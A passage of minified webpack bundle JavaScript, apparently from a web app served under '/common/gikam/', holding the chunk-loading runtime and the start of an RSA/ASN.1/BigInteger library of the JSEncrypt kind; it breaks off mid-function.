for (var n = "css/" + ({}[A] || A) + ".css", a = o.p + n, s = document.getElementsByTagName("link"), i = 0; i < s.length; i++) {
var c = s[i]
, g = c.getAttribute("data-href") || c.getAttribute("href");
if ("stylesheet" === c.rel && (g === n || g === a))
return e()
}
var C = document.getElementsByTagName("style");
for (i = 0; i < C.length; i++) {
c = C[i],
g = c.getAttribute("data-href");
if (g === n || g === a)
return e()
}
var I = document.createElement("link");
I.rel = "stylesheet",
I.type = "text/css",
I.onload = e,
I.onerror = function(e) {
var n = e && e.target && e.target.src || a
, s = new Error("Loading CSS chunk " + A + " failed.\n(" + n + ")");
s.code = "CSS_CHUNK_LOAD_FAILED",
s.request = n,
delete r[A],
I.parentNode.removeChild(I),
t(s)
}
,
I.href = a;
var l = document.getElementsByTagName("head")[0];
l.appendChild(I)
}
)).then((function() {
r[A] = 0
}
)));
var n = a[A];
if (0 !== n)
if (n)
e.push(n[2]);
else {
var s = new Promise((function(e, t) {
n = a[A] = [e, t]
}
));
e.push(n[2] = s);
var c, g = document.createElement("script");
g.charset = "utf-8",
g.timeout = 120,
o.nc && g.setAttribute("nonce", o.nc),
g.src = i(A);
var C = new Error;
c = function(e) {
g.onerror = g.onload = null,
clearTimeout(I);
var t = a[A];
if (0 !== t) {
if (t) {
var n = e && ("load" === e.type ? "missing" : e.type)
, r = e && e.target && e.target.src;
C.message = "Loading chunk " + A + " failed.\n(" + n + ": " + r + ")",
C.name = "ChunkLoadError",
C.type = n,
C.request = r,
t[1](C)
}
a[A] = void 0
}
}
;
var I = setTimeout((function() {
c({
type: "timeout",
target: g
})
}
), 12e4);
g.onerror = g.onload = c,
document.head.appendChild(g)
}
return Promise.all(e)
}
,
o.m = A,
o.c = n,
o.d = function(A, e, t) {
o.o(A, e) || Object.defineProperty(A, e, {
enumerable: !0,
get: t
})
}
,
o.r = function(A) {
"undefined" !== typeof Symbol && Symbol.toStringTag && Object.defineProperty(A, Symbol.toStringTag, {
value: "Module"
}),
Object.defineProperty(A, "__esModule", {
value: !0
})
}
,
o.t = function(A, e) {
if (1 & e && (A = o(A)),
8 & e)
return A;
if (4 & e && "object" === typeof A && A && A.__esModule)
return A;
var t = Object.create(null);
if (o.r(t),
Object.defineProperty(t, "default", {
enumerable: !0,
value: A
}),
2 & e && "string" != typeof A)
for (var n in A)
o.d(t, n, function(e) {
return A[e]
}
.bind(null, n));
return t
}
,
o.n = function(A) {
var e = A && A.__esModule ? function() {
return A["default"]
}
: function() {
return A
}
;
return o.d(e, "a", e),
e
}
,
o.o = function(A, e) {
return Object.prototype.hasOwnProperty.call(A, e)
}
,
o.p = "/common/gikam/",
o.oe = function(A) {
throw console.error(A),
A
}
;
var c = window["webpackJsonp"] = window["webpackJsonp"] || []
, g = c.push.bind(c);
c.push = e,
c = c.slice();
for (var C = 0; C < c.length; C++)
e(c[C]);
var I = g;
s.push([4, "chunk-vendors", "chunk-common"]),
t()
loader = o ;
}
)(
{
9816: function(e, t, n) {
"use strict";
var r = "0123456789abcdefghijklmnopqrstuvwxyz";
function o(e) {
return r.charAt(e)
}
function i(e, t) {
return e & t
}
function a(e, t) {
return e | t
}
function s(e, t) {
return e ^ t
}
function l(e, t) {
return e & ~t
}
function c(e) {
if (0 == e)
return -1;
var t = 0;
return 0 == (65535 & e) && (e >>= 16,
t += 16),
0 == (255 & e) && (e >>= 8,
t += 8),
0 == (15 & e) && (e >>= 4,
t += 4),
0 == (3 & e) && (e >>= 2,
t += 2),
0 == (1 & e) && ++t,
t
}
function u(e) {
var t = 0;
while (0 != e)
e &= e - 1,
++t;
return t
}
var d, f = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/", h = "=";
function p(e) {
var t, n, r = "";
for (t = 0; t + 3 <= e.length; t += 3)
n = parseInt(e.substring(t, t + 3), 16),
r += f.charAt(n >> 6) + f.charAt(63 & n);
t + 1 == e.length ? (n = parseInt(e.substring(t, t + 1), 16),
r += f.charAt(n << 2)) : t + 2 == e.length && (n = parseInt(e.substring(t, t + 2), 16),
r += f.charAt(n >> 2) + f.charAt((3 & n) << 4));
while ((3 & r.length) > 0)
r += h;
return r
}
function m(e) {
var t, n = "", r = 0, i = 0;
for (t = 0; t < e.length; ++t) {
if (e.charAt(t) == h)
break;
var a = f.indexOf(e.charAt(t));
a < 0 || (0 == r ? (n += o(a >> 2),
i = 3 & a,
r = 1) : 1 == r ? (n += o(i << 2 | a >> 4),
i = 15 & a,
r = 2) : 2 == r ? (n += o(i),
n += o(a >> 2),
i = 3 & a,
r = 3) : (n += o(i << 2 | a >> 4),
n += o(15 & a),
r = 0))
}
return 1 == r && (n += o(i << 2)),
n
}
var v, g = {
decode: function(e) {
var t;
if (void 0 === d) {
var n = "0123456789ABCDEF"
, r = " \f\n\r\t \u2028\u2029";
for (d = {},
t = 0; t < 16; ++t)
d[n.charAt(t)] = t;
for (n = n.toLowerCase(),
t = 10; t < 16; ++t)
d[n.charAt(t)] = t;
for (t = 0; t < r.length; ++t)
d[r.charAt(t)] = -1
}
var o = []
, i = 0
, a = 0;
for (t = 0; t < e.length; ++t) {
var s = e.charAt(t);
if ("=" == s)
break;
if (s = d[s],
-1 != s) {
if (void 0 === s)
throw new Error("Illegal character at offset " + t);
i |= s,
++a >= 2 ? (o[o.length] = i,
i = 0,
a = 0) : i <<= 4
}
}
if (a)
throw new Error("Hex encoding incomplete: 4 bits missing");
return o
}
}, b = {
decode: function(e) {
var t;
if (void 0 === v) {
var n = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
, r = "= \f\n\r\t \u2028\u2029";
for (v = Object.create(null),
t = 0; t < 64; ++t)
v[n.charAt(t)] = t;
for (v["-"] = 62,
v["_"] = 63,
t = 0; t < r.length; ++t)
v[r.charAt(t)] = -1
}
var o = []
, i = 0
, a = 0;
for (t = 0; t < e.length; ++t) {
var s = e.charAt(t);
if ("=" == s)
break;
if (s = v[s],
-1 != s) {
if (void 0 === s)
throw new Error("Illegal character at offset " + t);
i |= s,
++a >= 4 ? (o[o.length] = i >> 16,
o[o.length] = i >> 8 & 255,
o[o.length] = 255 & i,
i = 0,
a = 0) : i <<= 6
}
}
switch (a) {
case 1:
throw new Error("Base64 encoding incomplete: at least 2 bits missing");
case 2:
o[o.length] = i >> 10;
break;
case 3:
o[o.length] = i >> 16,
o[o.length] = i >> 8 & 255;
break
}
return o
},
re: /-----BEGIN [^-]+-----([A-Za-z0-9+\/=\s]+)-----END [^-]+-----|begin-base64[^\n]+\n([A-Za-z0-9+\/=\s]+)====/,
unarmor: function(e) {
var t = b.re.exec(e);
if (t)
if (t[1])
e = t[1];
else {
if (!t[2])
throw new Error("RegExp out of sync");
e = t[2]
}
return b.decode(e)
}
}, y = 1e13, _ = function() {
function e(e) {
this.buf = [+e || 0]
}
return e.prototype.mulAdd = function(e, t) {
var n, r, o = this.buf, i = o.length;
for (n = 0; n < i; ++n)
r = o[n] * e + t,
r < y ? t = 0 : (t = 0 | r / y,
r -= t * y),
o[n] = r;
t > 0 && (o[n] = t)
}
,
e.prototype.sub = function(e) {
var t, n, r = this.buf, o = r.length;
for (t = 0; t < o; ++t)
n = r[t] - e,
n < 0 ? (n += y,
e = 1) : e = 0,
r[t] = n;
while (0 === r[r.length - 1])
r.pop()
}
,
e.prototype.toString = function(e) {
if (10 != (e || 10))
throw new Error("only base 10 is supported");
for (var t = this.buf, n = t[t.length - 1].toString(), r = t.length - 2; r >= 0; --r)
n += (y + t[r]).toString().substring(1);
return n
}
,
e.prototype.valueOf = function() {
for (var e = this.buf, t = 0, n = e.length - 1; n >= 0; --n)
t = t * y + e[n];
return t
}
,
e.prototype.simplify = function() {
var e = this.buf;
return 1 == e.length ? e[0] : this
}
,
e
}(), x = "...", w = /^(\d\d)(0[1-9]|1[0-2])(0[1-9]|[12]\d|3[01])([01]\d|2[0-3])(?:([0-5]\d)(?:([0-5]\d)(?:[.,](\d{1,3}))?)?)?(Z|[-+](?:[0]\d|1[0-2])([0-5]\d)?)?$/, C = /^(\d\d\d\d)(0[1-9]|1[0-2])(0[1-9]|[12]\d|3[01])([01]\d|2[0-3])(?:([0-5]\d)(?:([0-5]\d)(?:[.,](\d{1,3}))?)?)?(Z|[-+](?:[0]\d|1[0-2])([0-5]\d)?)?$/;
function S(e, t) {
return e.length > t && (e = e.substring(0, t) + x),
e
}
var j, k = function() {
function e(t, n) {
this.hexDigits = "0123456789ABCDEF",
t instanceof e ? (this.enc = t.enc,
this.pos = t.pos) : (this.enc = t,
this.pos = n)
}
return e.prototype.get = function(e) {
if (void 0 === e && (e = this.pos++),
e >= this.enc.length)
throw new Error("Requesting byte offset " + e + " on a stream of length " + this.enc.length);
return "string" === typeof this.enc ? this.enc.charCodeAt(e) : this.enc[e]
}
,
e.prototype.hexByte = function(e) {
return this.hexDigits.charAt(e >> 4 & 15) + this.hexDigits.charAt(15 & e)
}
,
e.prototype.hexDump = function(e, t, n) {
for (var r = "", o = e; o < t; ++o)
if (r += this.hexByte(this.get(o)),
!0 !== n)
switch (15 & o) {
case 7:
r += " ";
break;
case 15:
r += "\n";
break;
default:
r += " "
}
return r
}
,
e.prototype.isASCII = function(e, t) {
for (var n = e; n < t; ++n) {
var r = this.get(n);
if (r < 32 || r > 176)
return !1
}
return !0
}
,
e.prototype.parseStringISO = function(e, t) {
for (var n = "", r = e; r < t; ++r)
n += String.fromCharCode(this.get(r));
return n
}
,
e.prototype.parseStringUTF = function(e, t) {
for (var n = "", r = e; r < t; ) {
var o = this.get(r++);
n += o < 128 ? String.fromCharCode(o) : o > 191 && o < 224 ? String.fromCharCode((31 & o) << 6 | 63 & this.get(r++)) : String.fromCharCode((15 & o) << 12 | (63 & this.get(r++)) << 6 | 63 & this.get(r++))
}
return n
}
,
e.prototype.parseStringBMP = function(e, t) {
for (var n, r, o = "", i = e; i < t; )
n = this.get(i++),
r = this.get(i++),
o += String.fromCharCode(n << 8 | r);
return o
}
,
e.prototype.parseTime = function(e, t, n) {
var r = this.parseStringISO(e, t)
, o = (n ? w : C).exec(r);
return o ? (n && (o[1] = +o[1],
o[1] += +o[1] < 70 ? 2e3 : 1900),
r = o[1] + "-" + o[2] + "-" + o[3] + " " + o[4],
o[5] && (r += ":" + o[5],
o[6] && (r += ":" + o[6],
o[7] && (r += "." + o[7]))),
o[8] && (r += " UTC",
"Z" != o[8] && (r += o[8],
o[9] && (r += ":" + o[9]))),
r) : "Unrecognized time: " + r
}
,
e.prototype.parseInteger = function(e, t) {
var n, r = this.get(e), o = r > 127, i = o ? 255 : 0, a = "";
while (r == i && ++e < t)
r = this.get(e);
if (n = t - e,
0 === n)
return o ? -1 : 0;
if (n > 4) {
a = r,
n <<= 3;
while (0 == (128 & (+a ^ i)))
a = +a << 1,
--n;
a = "(" + n + " bit)\n"
}
o && (r -= 256);
for (var s = new _(r), l = e + 1; l < t; ++l)
s.mulAdd(256, this.get(l));
return a + s.toString()
}
,
e.prototype.parseBitString = function(e, t, n) {
for (var r = this.get(e), o = (t - e - 1 << 3) - r, i = "(" + o + " bit)\n", a = "", s = e + 1; s < t; ++s) {
for (var l = this.get(s), c = s == t - 1 ? r : 0, u = 7; u >= c; --u)
a += l >> u & 1 ? "1" : "0";
if (a.length > n)
return i + S(a, n)
}
return i + a
}
,
e.prototype.parseOctetString = function(e, t, n) {
if (this.isASCII(e, t))
return S(this.parseStringISO(e, t), n);
var r = t - e
, o = "(" + r + " byte)\n";
n /= 2,
r > n && (t = e + n);
for (var i = e; i < t; ++i)
o += this.hexByte(this.get(i));
return r > n && (o += x),
o
}
,
e.prototype.parseOID = function(e, t, n) {
for (var r = "", o = new _, i = 0, a = e; a < t; ++a) {
var s = this.get(a);
if (o.mulAdd(128, 127 & s),
i += 7,
!(128 & s)) {
if ("" === r)
if (o = o.simplify(),
o instanceof _)
o.sub(80),
r = "2." + o.toString();
else {
var l = o < 80 ? o < 40 ? 0 : 1 : 2;
r = l + "." + (o - 40 * l)
}
else
r += "." + o.toString();
if (r.length > n)
return S(r, n);
o = new _,
i = 0
}
}
return i > 0 && (r += ".incomplete"),
r
}
,
e
}(), O = function() {
function e(e, t, n, r, o) {
if (!(r instanceof M))
throw new Error("Invalid tag value.");
this.stream = e,
this.header = t,
this.length = n,
this.tag = r,
this.sub = o
}
return e.prototype.typeName = function() {
switch (this.tag.tagClass) {
case 0:
switch (this.tag.tagNumber) {
case 0:
return "EOC";
case 1:
return "BOOLEAN";
case 2:
return "INTEGER";
case 3:
return "BIT_STRING";
case 4:
return "OCTET_STRING";
case 5:
return "NULL";
case 6:
return "OBJECT_IDENTIFIER";
case 7:
return "ObjectDescriptor";
case 8:
return "EXTERNAL";
case 9:
return "REAL";
case 10:
return "ENUMERATED";
case 11:
return "EMBEDDED_PDV";
case 12:
return "UTF8String";
case 16:
return "SEQUENCE";
case 17:
return "SET";
case 18:
return "NumericString";
case 19:
return "PrintableString";
case 20:
return "TeletexString";
case 21:
return "VideotexString";
case 22:
return "IA5String";
case 23:
return "UTCTime";
case 24:
return "GeneralizedTime";
case 25:
return "GraphicString";
case 26:
return "VisibleString";
case 27:
return "GeneralString";
case 28:
return "UniversalString";
case 30:
return "BMPString"
}
return "Universal_" + this.tag.tagNumber.toString();
case 1:
return "Application_" + this.tag.tagNumber.toString();
case 2:
return "[" + this.tag.tagNumber.toString() + "]";
case 3:
return "Private_" + this.tag.tagNumber.toString()
}
}
,
e.prototype.content = function(e) {
if (void 0 === this.tag)
return null;
void 0 === e && (e = 1 / 0);
var t = this.posContent()
, n = Math.abs(this.length);
if (!this.tag.isUniversal())
return null !== this.sub ? "(" + this.sub.length + " elem)" : this.stream.parseOctetString(t, t + n, e);
switch (this.tag.tagNumber) {
case 1:
return 0 === this.stream.get(t) ? "false" : "true";
case 2:
return this.stream.parseInteger(t, t + n);
case 3:
return this.sub ? "(" + this.sub.length + " elem)" : this.stream.parseBitString(t, t + n, e);
case 4:
return this.sub ? "(" + this.sub.length + " elem)" : this.stream.parseOctetString(t, t + n, e);
case 6:
return this.stream.parseOID(t, t + n, e);
case 16:
case 17:
return null !== this.sub ? "(" + this.sub.length + " elem)" : "(no elem)";
case 12:
return S(this.stream.parseStringUTF(t, t + n), e);
case 18:
case 19:
case 20:
case 21:
case 22:
case 26:
return S(this.stream.parseStringISO(t, t + n), e);
case 30:
return S(this.stream.parseStringBMP(t, t + n), e);
case 23:
case 24:
return this.stream.parseTime(t, t + n, 23 == this.tag.tagNumber)
}
return null
}
,
e.prototype.toString = function() {
return this.typeName() + "@" + this.stream.pos + "[header:" + this.header + ",length:" + this.length + ",sub:" + (null === this.sub ? "null" : this.sub.length) + "]"
}
,
e.prototype.toPrettyString = function(e) {
void 0 === e && (e = "");
var t = e + this.typeName() + " @" + this.stream.pos;
if (this.length >= 0 && (t += "+"),
t += this.length,
this.tag.tagConstructed ? t += " (constructed)" : !this.tag.isUniversal() || 3 != this.tag.tagNumber && 4 != this.tag.tagNumber || null === this.sub || (t += " (encapsulates)"),
t += "\n",
null !== this.sub) {
e += " ";
for (var n = 0, r = this.sub.length; n < r; ++n)
t += this.sub[n].toPrettyString(e)
}
return t
}
,
e.prototype.posStart = function() {
return this.stream.pos
}
,
e.prototype.posContent = function() {
return this.stream.pos + this.header
}
,
e.prototype.posEnd = function() {
return this.stream.pos + this.header + Math.abs(this.length)
}
,
e.prototype.toHexString = function() {
return this.stream.hexDump(this.posStart(), this.posEnd(), !0)
}
,
e.decodeLength = function(e) {
var t = e.get()
, n = 127 & t;
if (n == t)
return n;
if (n > 6)
throw new Error("Length over 48 bits not supported at position " + (e.pos - 1));
if (0 === n)
return null;
t = 0;
for (var r = 0; r < n; ++r)
t = 256 * t + e.get();
return t
}
,
e.prototype.getHexStringValue = function() {
var e = this.toHexString()
, t = 2 * this.header
, n = 2 * this.length;
return e.substr(t, n)
}
,
e.decode = function(t) {
var n;
n = t instanceof k ? t : new k(t,0);
var r = new k(n)
, o = new M(n)
, i = e.decodeLength(n)
, a = n.pos
, s = a - r.pos
, l = null
, c = function() {
var t = [];
if (null !== i) {
var r = a + i;
while (n.pos < r)
t[t.length] = e.decode(n);
if (n.pos != r)
throw new Error("Content size is not correct for container starting at offset " + a)
} else
try {
for (; ; ) {
var o = e.decode(n);
if (o.tag.isEOC())
break;
t[t.length] = o
}
i = a - n.pos
} catch (s) {
throw new Error("Exception while decoding undefined length content: " + s)
}
return t
};
if (o.tagConstructed)
l = c();
else if (o.isUniversal() && (3 == o.tagNumber || 4 == o.tagNumber))
try {
if (3 == o.tagNumber && 0 != n.get())
throw new Error("BIT STRINGs with unused bits cannot encapsulate.");
l = c();
for (var u = 0; u < l.length; ++u)
if (l[u].tag.isEOC())
throw new Error("EOC is not supposed to be actual content.")
} catch (d) {
l = null
}
if (null === l) {
if (null === i)
throw new Error("We can't skip over an invalid tag with undefined length at offset " + a);
n.pos = a + Math.abs(i)
}
return new e(r,s,i,o,l)
}
,
e
}(), M = function() {
function e(e) {
var t = e.get();
if (this.tagClass = t >> 6,
this.tagConstructed = 0 !== (32 & t),
this.tagNumber = 31 & t,
31 == this.tagNumber) {
var n = new _;
do {
t = e.get(),
n.mulAdd(128, 127 & t)
} while (128 & t);
this.tagNumber = n.simplify()
}
}
return e.prototype.isUniversal = function() {
return 0 === this.tagClass
}
,
e.prototype.isEOC = function() {
return 0 === this.tagClass && 0 === this.tagNumber
}
,
e
}(), T = 0xdeadbeefcafe, P = 15715070 == (16777215 & T), L = [2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37, 41, 43, 47, 53, 59, 61, 67, 71, 73, 79, 83, 89, 97, 101, 103, 107, 109, 113, 127, 131, 137, 139, 149, 151, 157, 163, 167, 173, 179, 181, 191, 193, 197, 199, 211, 223, 227, 229, 233, 239, 241, 251, 257, 263, 269, 271, 277, 281, 283, 293, 307, 311, 313, 317, 331, 337, 347, 349, 353, 359, 367, 373, 379, 383, 389, 397, 401, 409, 419, 421, 431, 433, 439, 443, 449, 457, 461, 463, 467, 479, 487, 491, 499, 503, 509, 521, 523, 541, 547, 557, 563, 569, 571, 577, 587, 593, 599, 601, 607, 613, 617, 619, 631, 641, 643, 647, 653, 659, 661, 673, 677, 683, 691, 701, 709, 719, 727, 733, 739, 743, 751, 757, 761, 769, 773, 787, 797, 809, 811, 821, 823, 827, 829, 839, 853, 857, 859, 863, 877, 881, 883, 887, 907, 911, 919, 929, 937, 941, 947, 953, 967, 971, 977, 983, 991, 997], z = (1 << 26) / L[L.length - 1], D = function() {
function e(e, t, n) {
null != e && ("number" == typeof e ? this.fromNumber(e, t, n) : null == t && "string" != typeof e ? this.fromString(e, 256) : this.fromString(e, t))
}
return e.prototype.toString = function(e) {
if (this.s < 0)
return "-" + this.negate().toString(e);
var t;
if (16 == e)
t = 4;
else if (8 == e)
t = 3;
else if (2 == e)
t = 1;
else if (32 == e)
t = 5;
else {
if (4 != e)
return this.toRadix(e);
t = 2
}
var n, r = (1 << t) - 1, i = !1, a = "", s = this.t, l = this.DB - s * this.DB % t;
if (s-- > 0) {
l < this.DB && (n = this[s] >> l) > 0 && (i = !0,
a = o(n));
while (s >= 0)
l < t ? (n = (this[s] & (1 << l) - 1) << t - l,
n |= this[--s] >> (l += this.DB - t)) : (n = this[s] >> (l -= t) & r,
l <= 0 && (l += this.DB,
--s)),
n > 0 && (i = !0),
i && (a += o(n))
}
return i ? a : "0"
}
,
e.prototype.negate = function() {
var t = R();
return e.ZERO.subTo(this, t),
t
}
,
e.prototype.abs = function() {
return this.s < 0 ? this.negate() : this
}
,
e.prototype.compareTo = function(e) {
var t = this.s - e.s;
if (0 != t)
return t;
var n = this.t;
if (t = n - e.t,
0 != t)
return this.s < 0 ? -t : t;
while (--n >= 0)
if (0 != (t = this[n] - e[n]))
return t;
return 0
}
,
e.prototype.bitLength = function() {
return this.t <= 0 ? 0 : this.DB * (this.t - 1) + U(this[this.t - 1] ^ this.s & this.DM)
}
,
e.prototype.mod = function(t) {
var n = R();
return this.abs().divRemTo(t, null, n),
this.s < 0 && n.compareTo(e.ZERO) > 0 && t.subTo(n, n),
n
}
,
e.prototype.modPowInt = function(e, t) {
var n;
return n = e < 256 || t.isEven() ? new A(t) : new H(t),
this.exp(e, n)
}
,
e.prototype.clone = function() {
var e = R();
return this.copyTo(e),
e
}
,
e.prototype.intValue = function() {
if (this.s < 0) {
if (1 == this.t)
return this[0] - this.DV;
if (0 == this.t)
return -1
} else {
if (1 == this.t)
return this[0];
if (0 == this.t)
return 0
}
return (this[1] & (1 << 32 - this.DB) - 1) << this.DB | this[0]
}
,
e.prototype.byteValue = function() {
return 0 == this.t ? this.s : this[0] << 24 >> 24
}
,
e.prototype.shortValue = function() {
return 0 == this.t ? this.s : this[0] << 16 >> 16
}
,
e.prototype.signum = function() {
return this.s < 0 ? -1 : this.t <= 0 || 1 == this.t && this[0] <= 0 ? 0 : 1
}
,
e.prototype.toByteArray = function() {
var e = this.t
, t = [];
t[0] = this.s;
var n, r = this.DB - e * this.DB % 8, o = 0;
if (e-- > 0) {
r < this.DB && (n = this[e] >> r) != (this.s & this.DM) >> r && (t[o++] = n | this.s << this.DB - r);
while (e >= 0)
r < 8 ? (n = (this[e] & (1 << r) - 1) << 8 - r,
n |= this[--e] >> (r += this.DB - 8)) : (n = this[e] >> (r -= 8) & 255,
r <= 0 && (r += this.DB,
--e)),
0 != (128 & n) && (n |= -256),
0 == o && (128 & this.s) != (128 & n) && ++o,
(o > 0 || n != this.s) && (t[o++] = n)
}
return t
}
,
e.prototype.equals = function(e) {
return 0 == this.compareTo(e)
}
,
e.prototype.min = function(e) {
return this.compareTo(e) < 0 ? this : e
}
,
e.prototype.max = function(e) {
return this.compareTo(e) > 0 ? this : e
}
,
e.prototype.and = function(e) {
var t = R();
return this.bitwiseTo(e, i, t),
t
}
,
e.prototype.or = function(e) {
var t = R();
return this.bitwiseTo(e, a, t),
t
}
,
e.prototype.xor = function(e) {
var t = R();
return this.bitwiseTo(e, s, t),
t
}
,
e.prototype.andNot = function(e) {
var t = R();
return this.bitwiseTo(e, l, t),
t
}
,
e.prototype.not = function() {
for (var e = R(), t = 0; t < this.t; ++t)
e[t] = this.DM & ~this[t];
return e.t = this.t,
e.s = ~this.s,
e
}
,
e.prototype.shiftLeft = function(e) {
var t = R();
return e < 0 ? this.rShiftTo(-e, t) : this.lShiftTo(e, t),
t
}
,
e.prototype.shiftRight = function(e) {
var t = R();
return e < 0 ? this.lShiftTo(-e, t) : this.rShiftTo(e, t),
t
}
,
e.prototype.getLowestSetBit = function() {
for (var e = 0; e < this.t; ++e)
if (0 != this[e])
return e * this.DB + c(this[e]);
return this.s < 0 ? this.t * this.DB : -1
}
,
e.prototype.bitCount = function() {
for (var e = 0, t = this.s & this.DM, n = 0; n < this.t; ++n)
e += u(this[n] ^ t);
return e
}
,
e.prototype.testBit = function(e) {
var t = Math.floor(e / this.DB);
return t >= this.t ? 0 != this.s : 0 != (this[t] & 1 << e % this.DB)
}
,
e.prototype.setBit = function(e) {
return this.changeBit(e, a)
}
,
e.prototype.clearBit = function(e) {
return this.changeBit(e, l)
}
,
e.prototype.flipBit = function(e) {
return this.changeBit(e, s)
}
,
e.prototype.add = function(e) {
var t = R();
return this.addTo(e, t),
t
}
,
e.prototype.subtract = function(e) {
var t = R();
return this.subTo(e, t),
t
}
,
e.prototype.multiply = function(e) {
var t = R();
return this.multiplyTo(e, t),
t
}
,
e.prototype.divide = function(e) {
var t = R();
return this.divRemTo(e, t, null),
t
}
,
e.prototype.remainder = function(e) {
var t = R();
return this.divRemTo(e, null, t),
t
}
,
e.prototype.divideAndRemainder = function(e) {
var t = R()
, n = R();
return this.divRemTo(e, t, n),
[t, n]
}
,
e.prototype.modPow = function(e, t) {
var n, r, o = e.bitLength(), i = W(1);
if (o <= 0)
return i;
n = o < 18 ? 1 : o < 48 ? 3 : o < 144 ? 4 : o < 768 ? 5 : 6,
r = o < 8 ? new A(t) : t.isEven() ? new V(t) : new H(t);
var a = []
, s = 3
, l = n - 1
, c = (1 << n) - 1;
if (a[1] = r.convert(this),
n > 1) {
var u = R();
r.sqrTo(a[1], u);
while (s <= c)
a[s] = R(),
r.mulTo(u, a[s - 2], a[s]),
s += 2
}
var d, f, h = e.t - 1, p = !0, m = R();
o = U(e[h]) - 1;
while (h >= 0) {
o >= l ? d = e[h] >> o - l & c : (d = (e[h] & (1 << o + 1) - 1) << l - o,
h > 0 && (d |= e[h - 1] >> this.DB + o - l)),
s = n;
while (0 == (1 & d))
d >>= 1,
--s;
if ((o -= s) < 0 && (o += this.DB,
--h),
p)
a[d].copyTo(i),
p = !1;
else {
while (s > 1)
r.sqrTo(i, m),
r.sqrTo(m, i),
s -= 2;
s > 0 ? r.sqrTo(i, m) : (f = i,
i = m,
m = f),
r.mulTo(m, a[d], i)
}
while (h >= 0 && 0 == (e[h] & 1 << o))
r.sqrTo(i, m),
f = i,
i = m,
m = f,
--o < 0 && (o = this.DB - 1,
--h)
}
return r.revert(i)
}
,
e.prototype.modInverse = function(t) {
var n = t.isEven();
if (this.isEven() && n || 0 == t.signum())
return e.ZERO;
var r = t.clone()
, o = this.clone()
, i = W(1)
, a = W(0)
, s = W(0)
, l = W(1);
while (0 != r.signum()) {
while (r.isEven())
r.rShiftTo(1, r),
n ? (i.isEven() && a.isEven() || (i.addTo(this, i),
a.subTo(t, a)),
i.rShiftTo(1, i)) : a.isEven() || a.subTo(t, a),
a.rShiftTo(1, a);
while (o.isEven())
o.rShiftTo(1, o),
n ? (s.isEven() && l.isEven() || (s.addTo(this, s),
l.subTo(t, l)),
s.rShiftTo(1, s)) : l.isEven() || l.subTo(t, l),
l.rShiftTo(1, l);
r.compareTo(o) >= 0 ? (r.subTo(o, r),
n && i.subTo(s, i),
a.subTo(l, a)) : (o.subTo(r, o),
n && s.subTo(i, s),
l.subTo(a, l))
}
return 0 != o.compareTo(e.ONE) ? e.ZERO : l.compareTo(t) >= 0 ? l.subtract(t) : l.signum() < 0 ? (l.addTo(t, l),
l.signum() < 0 ? l.add(t) : l) : l
}
,
e.prototype.pow = function(e) {
return this.exp(e, new E)
}
,
e.prototype.gcd = function(e) {
var t = this.s < 0 ? this.negate() : this.clone()
, n = e.s < 0 ? e.negate() : e.clone();
if (t.compareTo(n) < 0) {
var r = t;
t = n,
n = r
}
var o = t.getLowestSetBit()
, i = n.getLowestSetBit();
if (i < 0)
return t;
o < i && (i = o),
i > 0 && (t.rShiftTo(i, t),
n.rShiftTo(i, n));
while (t.signum() > 0)
(o = t.getLowestSetBit()) > 0 && t.rShiftTo(o, t),
(o = n.getLowestSetBit()) > 0 && n.rShiftTo(o, n),
t.compareTo(n) >= 0 ? (t.subTo(n, t),
t.rShiftTo(1, t)) : (n.subTo(t, n),
n.rShiftTo(1, n));
return i > 0 && n.lShiftTo(i, n),
n
}
,
e.prototype.isProbablePrime = function(e) {
var t, n = this.abs();
if (1 == n.t && n[0] <= L[L.length - 1]) {
for (t = 0; t < L.length; ++t)
if (n[0] == L[t])
return !0;
return !1
}
if (n.isEven())
return !1;
t = 1;
while (t < L.length) {
var r = L[t]
, o = t + 1;
while (o < L.length && r < z)
r *= L[o++];
r = n.modInt(r);
while (t < o)
if (r % L[t++] == 0)
return !1
}
return n.millerRabin(e)
}
,
e.prototype.copyTo = function(e) {
for (var t = this.t - 1; t >= 0; --t)
e[t] = this[t];
e.t = this.t,
e.s = this.s
}
,
e.prototype.fromInt = function(e) {
this.t = 1,
this.s = e < 0 ? -1 : 0,
e > 0 ? this[0] = e : e < -1 ? this[0] = e + this.DV : this.t = 0
}
,
e.prototype.fromString = function(t, n) {
var r;
if (16 == n)
r = 4;
else if (8 == n)
r = 3;
else if (256 == n)
r = 8;
else if (2 == n)
r = 1;
else if (32 == n)
r = 5;
else {
if (4 != n)
return void this.fromRadix(t, n);
r = 2
}
this.t = 0,
this.s = 0;
var o = t.length
, i = !1
, a = 0;
while (--o >= 0) {
var s = 8 == r ? 255 & +t[o] : K(t, o);
s < 0 ? "-" == t.charAt(o) && (i = !0) : (i = !1,
0 == a ? this[this.t++] = s : a + r > this.DB ? (this[this.t - 1] |= (s & (1 << this.DB - a) - 1) << a,
this[this.t++] = s >> this.DB - a) : this[this.t - 1] |= s << a,
a += r,
a >= this.DB && (a -= this.DB))
}
8 == r && 0 != (128 & +t[0]) && (this.s = -1,
a > 0 && (this[this.t - 1] |= (1 << this.DB - a) - 1 << a)),
this.clamp(),
i && e.ZERO.subTo(this, this)
}
,
e.prototype.clamp = function() {
var e = this.s & this.DM;
while (this.t > 0 && this[this.t - 1] == e)
--this.t
}
,
e.prototype.dlShiftTo = function(e, t) {
var n;
for (n = this.t - 1; n >= 0; --n)
t[n + e] = this[n];
for (n = e - 1; n >= 0; --n)
t[n] = 0;
t.t = this.t + e,
t.s = this.s
}
,
e.prototype.drShiftTo = function(e, t) {
for (var n = e; n < this.t; ++n)
t[n - e] = this[n];
t.t = Math.max(this.t - e, 0),
t.s = this.s
}
,
e.prototype.lShiftTo = function(e, t) {
for (var n = e % this.DB, r = this.DB - n, o = (1 << r) - 1, i = Math.floor(e / this.DB), a = this.s << n & this.DM, s = this.t - 1; s >= 0; --s)
t[s + i + 1] = this[s] >> r | a,
a = (this[s] & o) << n;
for (s = i - 1; s >= 0; --s)
t[s] = 0;
t[i] = a,
t.t = this.t + i + 1,
t.s = this.s,
t.clamp()
}
,
e.prototype.rShiftTo = function(e, t) {
t.s = this.s;
var n = Math.floor(e / this.DB);
if (n >= this.t)
t.t = 0;
else {
var r = e % this.DB
, o = this.DB - r
, i = (1 << r) - 1;
t[0] = this[n] >> r;
